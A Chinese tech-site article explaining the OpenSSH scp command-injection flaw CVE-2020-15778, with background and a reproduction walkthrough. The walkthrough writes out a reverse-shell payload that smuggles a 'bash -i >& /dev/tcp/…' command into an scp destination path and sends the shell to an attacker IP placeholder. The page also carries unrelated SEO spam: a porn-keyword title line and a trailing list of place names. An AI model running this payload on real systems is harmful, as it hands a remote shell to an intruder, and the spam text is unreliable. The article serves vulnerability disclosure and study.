91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

OpenSSH命令注入漏洞CVE-2020-15778的怎么理解

發布時間:2021-12-28 17:35:15 來源:億速云 閱讀:329 作者:柒染 欄目:安全技術

本篇文章給大家分享的是有關 OpenSSH命令注入漏洞CVE-2020-15778的怎么理解,小編覺得挺實用的,因此分享給大家學習,希望大家閱讀完這篇文章后可以有所收獲,話不多說,跟著小編一起來看看吧。

一、漏洞概要

2020年6月9日,研究人員Chinmay Pandya在Openssh中發現了一個漏洞,于7月18日公開。OpenSSH的8.3p1中的scp允許在scp.c遠程功能中注入命令,攻擊者可利用該漏洞執行任意命令。目前絕大多數linux系統受影響。深信服安全研究團隊依據漏洞重要性和影響力進行評估,作出漏洞通告。

二、漏洞分析

2.1 OpenSSH介紹
OpenSSH是用于使用SSH協議進行遠程登錄的一個開源實現。通過對交互的流量進行加密防止竊聽,連接劫持以及其他攻擊。OpenSSH由OpenBSD項目的一些開發人員開發, 并以BSD樣式的許可證提供,且已被集成到許多商業產品中。
2.2 漏洞描述
研究人員Chinmay Pandya在openssh的scp組件中發現了一個命令注入漏洞。OpenSSH的8.3p1中的scp允許在scp.c遠程功能中注入命令,攻擊者可利用該漏洞執行任意命令。目前絕大多數linux系統受影響。
2.2.1 scp命令簡介
scp 是 secure copy 的縮寫。在linux系統中,scp用于linux之間復制文件和目錄,基于 ssh 登陸進行安全的遠程文件拷貝命令。該命令由openssh的scp.c及其他相關代碼實現。
2.2.2 漏洞復現
scp命令引發的命令注入

反彈shell的payload

scp 1.txt cracer@受害機ip:'`bash -i >& /dev/tcp/攻擊機ip/4444 0>&1`/tmp/test.txt'

實戰測試,這里使用本機進行測試
1、查看ssh版本,符合漏洞版本

ssh -V

OpenSSH命令注入漏洞CVE-2020-15778的怎么理解

2、先在本地新建好文件,用于上傳

OpenSSH命令注入漏洞CVE-2020-15778的怎么理解

3、本地開啟監聽

OpenSSH命令注入漏洞CVE-2020-15778的怎么理解

3、使用scp命令注入成功反彈shellOpenSSH命令注入漏洞CVE-2020-15778的怎么理解OpenSSH命令注入漏洞CVE-2020-15778的怎么理解

以上就是 OpenSSH命令注入漏洞CVE-2020-15778的怎么理解,小編相信有部分知識點可能是我們日常工作會見到或用到的。希望你能通過這篇文章學到更多知識。更多詳情敬請關注億速云行業資訊頻道。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

安多县| 左权县| 聊城市| 赤峰市| 偃师市| 磴口县| 洛扎县| 宝应县| 南皮县| 得荣县| 金华市| 离岛区| 福安市| 云南省| 延庆县| 桃源县| 波密县| 北安市| 含山县| 安远县| 宝兴县| 江口县| 新建县| 保康县| 探索| 嵊泗县| 醴陵市| 独山县| 尼木县| 富源县| 民权县| 辉县市| 丰镇市| 普格县| 台山市| 黔江区| 遂宁市| 阳高县| 安新县| 平邑县| 贺兰县|